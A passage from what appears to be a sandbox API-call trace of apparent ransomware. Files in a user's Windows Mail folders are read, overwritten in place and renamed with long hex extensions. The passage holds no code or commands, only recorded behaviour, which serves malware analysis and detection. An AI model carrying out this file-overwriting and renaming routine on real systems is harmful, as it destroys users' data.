(FileHandle=0x594, IoStatusBlock=0x714f89c, FileInformation=0x427b010, Length=0x178, FileInformationClass=0xa) returned 0x0 [0163.351] CloseHandle (hObject=0x594) returned 1 [0163.356] GetProcessHeap () returned 0x270000 [0163.358] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0163.358] RtlInterlockedCompareExchange64 () returned 0x2 [0163.358] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.562] WriteFile (in: hFile=0x5b8, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0163.564] RtlInterlockedCompareExchange64 () returned 0x0 [0163.564] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.579] WriteFile (in: hFile=0x5b8, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0163.580] RtlInterlockedCompareExchange64 () returned 0x0 [0163.580] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.671] ReadFile (in: hFile=0x58c, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, 
lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0163.671] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.672] WriteFile (in: hFile=0x58c, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0163.674] RtlInterlockedCompareExchange64 () returned 0x0 [0163.674] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.675] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x74c20b8, ReturnLength=0x714f8ac) returned 0x0 [0163.677] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log", lpString2=".823333C472BB48A0AB008FD1286A199BC86E23BCD9BF5217695AD4CD57AC7724" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log.823333C472BB48A0AB008FD1286A199BC86E23BCD9BF5217695AD4CD57AC7724") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log.823333C472BB48A0AB008FD1286A199BC86E23BCD9BF5217695AD4CD57AC7724" [0163.677] GetProcessHeap () returned 0x270000 [0163.677] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13e) returned 0x328b48 [0163.677] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x714f89c, FileInformation=0x328b48, Length=0x13e, FileInformationClass=0xa) 
returned 0x0 [0163.679] CloseHandle (hObject=0x58c) returned 1 [0163.707] GetProcessHeap () returned 0x270000 [0163.709] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0163.709] RtlInterlockedCompareExchange64 () returned 0x1 [0163.709] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.714] ReadFile (in: hFile=0x58c, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0163.714] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.716] WriteFile (in: hFile=0x58c, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0163.717] RtlInterlockedCompareExchange64 () returned 0x0 [0163.717] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.718] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x74c20b8, ReturnLength=0x714f8ac) returned 0x0 [0163.720] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows 
Mail\\edb00001.log", lpString2=".3274C04344A8E44BBE73FFE909828531FB6F62F75542C8207A7DA54404812A69" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log.3274C04344A8E44BBE73FFE909828531FB6F62F75542C8207A7DA54404812A69") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log.3274C04344A8E44BBE73FFE909828531FB6F62F75542C8207A7DA54404812A69" [0163.720] GetProcessHeap () returned 0x270000 [0163.720] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x148) returned 0x4257550 [0163.720] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x714f89c, FileInformation=0x4257550, Length=0x148, FileInformationClass=0xa) returned 0x0 [0163.722] CloseHandle (hObject=0x58c) returned 1 [0163.753] GetProcessHeap () returned 0x270000 [0163.755] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0163.755] RtlInterlockedCompareExchange64 () returned 0x1 [0163.755] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.763] ReadFile (in: hFile=0x5b8, lpBuffer=0x7400180, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0163.763] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.764] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: 
ObjectInformation=0x73e00f8, ReturnLength=0x714f8ac) returned 0x0 [0163.766] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg", lpString2=".15AA29BFABBDFD0CD4B5B1A5BBEB13E197FCAC43FE939A2B847D4CD896ADC50B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.15AA29BFABBDFD0CD4B5B1A5BBEB13E197FCAC43FE939A2B847D4CD896ADC50B") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.15AA29BFABBDFD0CD4B5B1A5BBEB13E197FCAC43FE939A2B847D4CD896ADC50B" [0163.766] GetProcessHeap () returned 0x270000 [0163.766] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x158) returned 0x35b308 [0163.766] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x714f89c, FileInformation=0x35b308, Length=0x158, FileInformationClass=0xa) returned 0x0 [0163.772] CloseHandle (hObject=0x5b8) returned 1 [0163.861] GetProcessHeap () returned 0x270000 [0163.863] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0163.863] RtlInterlockedCompareExchange64 () returned 0x1 [0163.863] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.863] ReadFile (in: hFile=0x5bc, lpBuffer=0x75ca808, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x0, lpOverlapped=0x75aa6d0 | out: lpBuffer=0x75ca808*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75aa6d0) returned 1 [0163.863] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, 
lpOverlapped=0x714f8b0) returned 1 [0163.863] ReadFile (in: hFile=0x5c0, lpBuffer=0x7620190, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7600058 | out: lpBuffer=0x7620190*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7600058) returned 1 [0163.863] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.876] WriteFile (in: hFile=0x594, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x1800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 [0163.877] RtlInterlockedCompareExchange64 () returned 0x4 [0163.877] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.877] NtQueryObject (in: Handle=0x5a8, ObjectInformationClass=0x1, ObjectInformation=0x7582628, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x7582628, ReturnLength=0x714f8ac) returned 0x0 [0163.878] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg", lpString2=".B16834F526A94EC78CFF41D68EE5F6683FE1987F040002C9992EA340C23BE829" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.B16834F526A94EC78CFF41D68EE5F6683FE1987F040002C9992EA340C23BE829") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.B16834F526A94EC78CFF41D68EE5F6683FE1987F040002C9992EA340C23BE829" [0163.878] 
GetProcessHeap () returned 0x270000 [0163.878] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x166) returned 0x7420f30 [0163.878] NtSetInformationFile (FileHandle=0x5a8, IoStatusBlock=0x714f89c, FileInformation=0x7420f30, Length=0x166, FileInformationClass=0xa) returned 0x0 [0163.881] CloseHandle (hObject=0x5a8) returned 1 [0163.883] GetProcessHeap () returned 0x270000 [0163.884] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7582578 | out: hHeap=0x270000) returned 1 [0163.884] RtlInterlockedCompareExchange64 () returned 0x5 [0163.885] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.885] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x744a270, ReturnLength=0x714f8ac) returned 0x0 [0163.886] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg", lpString2=".C3CC1893BB110443A077BFF823728301428F287800A849EF3863B0D654F68D78" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.C3CC1893BB110443A077BFF823728301428F287800A849EF3863B0D654F68D78") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.C3CC1893BB110443A077BFF823728301428F287800A849EF3863B0D654F68D78" [0163.886] GetProcessHeap () returned 0x270000 [0163.886] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x166) returned 0x74210a8 [0163.886] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x714f89c, FileInformation=0x74210a8, Length=0x166, FileInformationClass=0xa) returned 0x0 [0163.887] 
CloseHandle (hObject=0x594) returned 1 [0163.890] GetProcessHeap () returned 0x270000 [0163.891] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0163.899] RtlInterlockedCompareExchange64 () returned 0x4 [0163.900] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.331] ReadFile (in: hFile=0x5b4, lpBuffer=0x757a558, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x0, lpOverlapped=0x755a420 | out: lpBuffer=0x757a558*, lpNumberOfBytesRead=0x0, lpOverlapped=0x755a420) returned 1 [0164.331] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.331] ReadFile (in: hFile=0x5bc, lpBuffer=0x75a26b0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7582578 | out: lpBuffer=0x75a26b0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7582578) returned 1 [0164.332] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.332] ReadFile (in: hFile=0x5c0, lpBuffer=0x75ca808, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75aa6d0 | out: lpBuffer=0x75ca808*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75aa6d0) returned 1 [0164.332] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, 
lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.333] ReadFile (in: hFile=0x594, lpBuffer=0x76382e0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x76181a8 | out: lpBuffer=0x76382e0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76181a8) returned 1 [0164.333] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.333] ReadFile (in: hFile=0x5a8, lpBuffer=0x7660438, nNumberOfBytesToRead=0x7000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7640300 | out: lpBuffer=0x7660438*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7640300) returned 1 [0164.333] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.334] ReadFile (in: hFile=0x5c4, lpBuffer=0x7688590, nNumberOfBytesToRead=0x2a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7668458 | out: lpBuffer=0x7688590*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7668458) returned 1 [0164.334] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.334] ReadFile (in: hFile=0x5c8, lpBuffer=0x76b06e8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x76905b0 | out: lpBuffer=0x76b06e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76905b0) returned 1 [0164.335] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: 
lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.335] ReadFile (in: hFile=0x5cc, lpBuffer=0x76d8840, nNumberOfBytesToRead=0x7000, lpNumberOfBytesRead=0x0, lpOverlapped=0x76b8708 | out: lpBuffer=0x76d8840*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76b8708) returned 1 [0164.336] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.336] ReadFile (in: hFile=0x5d0, lpBuffer=0x7700998, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x76e0860 | out: lpBuffer=0x7700998*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76e0860) returned 1 [0164.336] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.336] ReadFile (in: hFile=0x5d4, lpBuffer=0x7728af0, nNumberOfBytesToRead=0x2600, lpNumberOfBytesRead=0x0, lpOverlapped=0x77089b8 | out: lpBuffer=0x7728af0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x77089b8) returned 1 [0164.337] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.337] ReadFile (in: hFile=0x5d8, lpBuffer=0x7750c48, nNumberOfBytesToRead=0x7c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7730b10 | out: lpBuffer=0x7750c48*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7730b10) returned 1 [0164.338] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, 
lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.338] ReadFile (in: hFile=0x5dc, lpBuffer=0x7778da0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7758c68 | out: lpBuffer=0x7778da0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7758c68) returned 1 [0164.338] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.338] ReadFile (in: hFile=0x5e0, lpBuffer=0x77a0ef8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7780dc0 | out: lpBuffer=0x77a0ef8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7780dc0) returned 1 [0164.339] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.339] WriteFile (in: hFile=0x5b4, lpBuffer=0x757a558*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x755a420 | out: lpBuffer=0x757a558*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x755a420) returned 1 [0164.341] RtlInterlockedCompareExchange64 () returned 0x1 [0164.341] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.341] WriteFile (in: hFile=0x5bc, lpBuffer=0x75a26b0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7582578 | out: lpBuffer=0x75a26b0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7582578) returned 1 [0164.343] 
RtlInterlockedCompareExchange64 () returned 0x2 [0164.343] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.343] WriteFile (in: hFile=0x5c0, lpBuffer=0x75ca808*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75aa6d0 | out: lpBuffer=0x75ca808*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75aa6d0) returned 1 [0164.344] RtlInterlockedCompareExchange64 () returned 0x3 [0164.344] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.344] WriteFile (in: hFile=0x594, lpBuffer=0x76382e0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76181a8 | out: lpBuffer=0x76382e0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76181a8) returned 1 [0164.346] RtlInterlockedCompareExchange64 () returned 0x4 [0164.346] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.346] WriteFile (in: hFile=0x5a8, lpBuffer=0x7660438*, nNumberOfBytesToWrite=0x7000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7640300 | out: lpBuffer=0x7660438*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7640300) returned 1 [0164.347] RtlInterlockedCompareExchange64 () returned 0x5 [0164.347] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: 
lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.347] WriteFile (in: hFile=0x5c4, lpBuffer=0x7688590*, nNumberOfBytesToWrite=0x2a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7668458 | out: lpBuffer=0x7688590*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7668458) returned 1 [0164.348] RtlInterlockedCompareExchange64 () returned 0x6 [0164.348] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.349] WriteFile (in: hFile=0x5c8, lpBuffer=0x76b06e8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76905b0 | out: lpBuffer=0x76b06e8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76905b0) returned 1 [0164.350] RtlInterlockedCompareExchange64 () returned 0x7 [0164.350] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, 